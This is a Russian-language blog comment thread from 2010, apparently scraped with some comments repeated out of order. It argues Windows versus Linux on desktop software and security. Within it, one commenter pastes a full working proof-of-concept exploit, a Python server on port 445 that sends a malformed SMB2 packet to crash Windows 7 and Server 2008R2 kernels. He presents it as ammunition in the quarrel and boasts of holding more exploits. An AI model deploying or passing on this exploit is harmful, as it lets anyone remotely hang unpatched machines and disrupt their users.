ну оно и не открыто:) но сам факт дырки то... тема то о дырках развивалась, и этот shurikh защитник хомячков просил указать ему хоть на одну дырку. но чо та слился быстро. эксплойтов то на примете есть несколько в загашничке на указать хомячку его места, ну чтоб знал кто его барен бгг.
самое забавное наблюдать как хомячки пищат в предвкушении выхода новой вин*, но по выходу жутко плюются и обсирают, юзают и обсирают, юзают и обсирают. хотя я вот не понимаю что в вин* такого нужного и оригинального, что нельзя заменить ( кроме игр, тут да, винду нужно держать ) а остального то софта валом. и на самый крайних случай есть wine.
если такой умный, найди-ка мне удобный и быстрый аналог ACD See. Аналог а) по скорости декодирования JPEG и масштабирования б) по всеядности в) имеющий вменяемый интерфейс. Абсолютно все поделия, которые я смотрел, не выполняют минимум 2 пункта из 3-х. Да, и замену МСОфису, которая смогла бы корректно открыть хотя бы мой диплом 6-тилетней давности - ОО.о открывает его из рук вон криво, хотя там ничего особенного нет. И, да, медиаплэйер с поддержкой DXVA :) - а то мне не нравится, что воспроизведение видео 1080р жрет столько проца, а видяха простаивает. Ну или нормальный софтовый декодер, не унылый ffmpeg. Потому как тот же CoreAVC в полностью софтовом режиме не грузит проц на тех же файлах более чем на 30%. Чё ж мне ещё-то не хватает для счастья в лине... ах да, нормального рендерера шрифтов - МСовский ClearType кроет кривую интерполяцию как ну вы поняли кто. Не говоря уже о качестве шрифтов в системах - все наборы из FreeType, Libertine, DjVu и прочие поделия ну никак не дотягивают до нормальных Times, Arail, Tahoma, Verdana, Courier New.
... раз, бо не интересно мне доказывать дураку, что он просто ленив и глуп. --аналог ACD See gThumb2 gQview ну и монстр типа совсем как ваш любимец Endeavour Mark II с кучей плюгинов и т.д. ---Да, и замену МСОфису старофис ---И, да, медиаплэйер с поддержкой DXVA да лю,ой плеер впринципе, хоть тот же mplayer который в основном из каропки. VDPAU есть давно, раньше чем в венде это плееры заумели гдето на годик, http://en.wikipedia.org/wiki/VDPAU в бональном мплеере окрываеца примерно так mplayer-vdpau или через гуй автоматом. ну любителям мс шрифтов можно юзать мс шрифты:) такая простая идея в голову не приходила? я например так и делаю.
что нельзя заменить у меня - нет нормально программы трассировки плат, понимающей стандартные форматы файла и нормально работающий, нет софта для для работы с прошивками телефонов. хотя бы на МТ626. Ну вот нету такого софта.
I. VULNERABILITY ------------------------- Windows 7 * , Server 2008R2 Remote Kernel Crash
II. BACKGROUND ------------------------- #FAIL,#FAIL,#FAIL SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn. #FAIL,#FAIL,#FAIL
III. DESCRIPTION ------------------------- See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific Windows 7/2008R2.
IV. PROOF OF CONCEPT ------------------------- #win7-crash.py: #Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop) #Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop. #NO BSOD, YOU GOTTA PULL THE PLUG. #To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash #Author: Laurent Gaffié #
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a.. "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41" "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00" "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01" "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20" "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e" "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
меньше гораздо, даже больше скажу, их нет. можите проверить и предоставить пруфлинк. например в опенбсд и солярис10:) только не в стороннем совте а именно в системе. ( линуксы не берём так как это дистрибутив сборная солянка ) могу показать где искать , например тут http://www.securityfocus.com а про не заменимость как десктоп ну кому как, вот папа у меня в игры не играет давно, и пользует с удовольствием какойто там из линуксов. кроме популярных иигр там всё есть:)
что такое "сама система"? голое ядро с tcp/ip стеком, или вообще голое ядро? а что такое ядро, когда в него встроены как минимум дрова? и кому оно нужно без всего остального? и я уже перечислял специфичный софт, которого ПРОСТО НЕТ на *nix-ах. Добавлю до кучи Nikon Caprure NX, который нужен для нормальной проявки .NEF файлов. Нормальной, качественной, а не той, которая не видит половину метаданных (я про dcraw и его front-end'ы в курсе, спасибо, кушайте сами).
что такое "сама система" - базовая система. спец софта вот нет для меня на винде. например вот для робота который у нас в конторе чистит днища кораблей. дрова есть под никсы:) оставте свою предвзятость. бо я вам тоже могу список софта выкатить, который вы ненайдёте под вынь. ваш разговор на уровне 16тилетнего ребёнка.
>бо я вам тоже могу список софта выкатить выкатите. я говорю про настольный софт.
>вы лучше по существу ответте, что делать с виннюкой я не спец по администрированию серверов, речь шла про настольные системы. мне лично наплевать, есть у моего рабочего компа на Windows 7 эта уязвимость или нет. о черверах речь не шла изначально, я писал про дескотпы, о чем неоднократно напоминал.
>ваш разговор на уровне 16тилетнего ребёнка а разговор ваш, с "хомячками", "ленивыми идиотами" и прочими оборотами, на уровне взрослого мужа, да? у нас весь разговор изначально пошел по принципу "сам дурак" :)
разговор начался о критических уязвимостях. вот пруф линки вё от вас жду. от меня пруфлинк на например виннюку вы получили, даже сам эксплойт рабочий. от вас пока только слова и непонятные сравнения тёплого с мягким, некому не интересные.
вы лучше по существу ответте, что делать с виннюкой? это то с чего начался разговор. но вы начали какие то децкие отмазки, что это вовсе не важная уязвимость и чинить не нужно.
no subject
Date: 2010-01-17 01:16 am (UTC)no subject
Date: 2010-01-17 01:21 am (UTC)no subject
Date: 2010-01-17 01:29 am (UTC)no subject
Date: 2010-01-17 01:30 am (UTC)no subject
Date: 2010-01-17 01:36 am (UTC)no subject
Date: 2010-01-17 01:43 am (UTC)хомячковпросил указать ему хоть на одну дырку. но чо та слился быстро. эксплойтов то на примете есть несколько в загашничке на указать хомячку его места, ну чтоб знал кто его барен бгг.no subject
Date: 2010-01-17 01:46 am (UTC)я больше радуюсь с дырявого адобе - это ж надо СТОЛЬКО ужасных дырок выпускать год за годов в своих акробат ридерах и флешах
no subject
Date: 2010-01-17 01:54 am (UTC)хотя я вот не понимаю что в вин* такого нужного и оригинального, что нельзя заменить ( кроме игр, тут да, винду нужно держать ) а остального то софта валом. и на самый крайних случай есть wine.
no subject
Date: 2010-01-17 01:55 am (UTC)no subject
Date: 2010-01-17 01:55 am (UTC)no subject
Date: 2010-01-17 01:57 am (UTC)(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:no subject
Date: 2010-01-17 07:04 am (UTC)отвеччаю вам последний...
Date: 2010-01-17 11:07 pm (UTC)--аналог ACD See
gThumb2
gQview
ну и монстр типа совсем как ваш любимец Endeavour Mark II с кучей плюгинов и т.д.
---Да, и замену МСОфису
старофис
---И, да, медиаплэйер с поддержкой DXVA
да лю,ой плеер впринципе, хоть тот же mplayer который в основном из каропки.
VDPAU есть давно, раньше чем в венде это плееры заумели гдето на годик,
http://en.wikipedia.org/wiki/VDPAU
в бональном мплеере окрываеца примерно так mplayer-vdpau или через гуй автоматом.
ну любителям мс шрифтов можно юзать мс шрифты:) такая простая идея в голову не приходила? я например так и делаю.
Re: отвеччаю вам последний...
From:вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: отвеччаю вам последний...
From:Re: отвеччаю вам последний...
From:no subject
Date: 2010-01-17 07:17 am (UTC)no subject
Date: 2010-01-17 01:32 am (UTC)-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash
II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL
III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific Windows 7/2008R2.
IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
no subject
Date: 2010-01-17 06:55 am (UTC)no subject
Date: 2010-01-17 10:55 pm (UTC)можите проверить и предоставить пруфлинк. например в опенбсд и солярис10:) только не в стороннем совте а именно в системе. ( линуксы не берём так как это дистрибутив сборная солянка )
могу показать где искать , например тут http://www.securityfocus.com
а про не заменимость как десктоп ну кому как, вот папа у меня в игры не играет давно, и пользует с удовольствием какойто там из линуксов. кроме популярных иигр там всё есть:)
no subject
Date: 2010-01-18 11:02 am (UTC)no subject
Date: 2010-01-18 12:05 pm (UTC)спец софта вот нет для меня на винде. например вот для робота который у нас в конторе чистит днища кораблей. дрова есть под никсы:) оставте свою предвзятость. бо я вам тоже могу список софта выкатить, который вы ненайдёте под вынь. ваш разговор на уровне 16тилетнего ребёнка.
no subject
Date: 2010-01-18 12:34 pm (UTC)выкатите. я говорю про настольный софт.
>вы лучше по существу ответте, что делать с виннюкой
я не спец по администрированию серверов, речь шла про настольные системы. мне лично наплевать, есть у моего рабочего компа на Windows 7 эта уязвимость или нет. о черверах речь не шла изначально, я писал про дескотпы, о чем неоднократно напоминал.
>ваш разговор на уровне 16тилетнего ребёнка
а разговор ваш, с "хомячками", "ленивыми идиотами" и прочими оборотами, на уровне взрослого мужа, да? у нас весь разговор изначально пошел по принципу "сам дурак" :)
no subject
Date: 2010-01-18 12:41 pm (UTC)(no subject)
From:no subject
Date: 2010-01-18 12:46 pm (UTC)(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:no subject
Date: 2010-01-18 12:07 pm (UTC)no subject
Date: 2010-01-18 09:54 pm (UTC)no subject
Date: 2010-01-18 10:03 pm (UTC)(no subject)
From:(no subject)
From:(no subject)
From: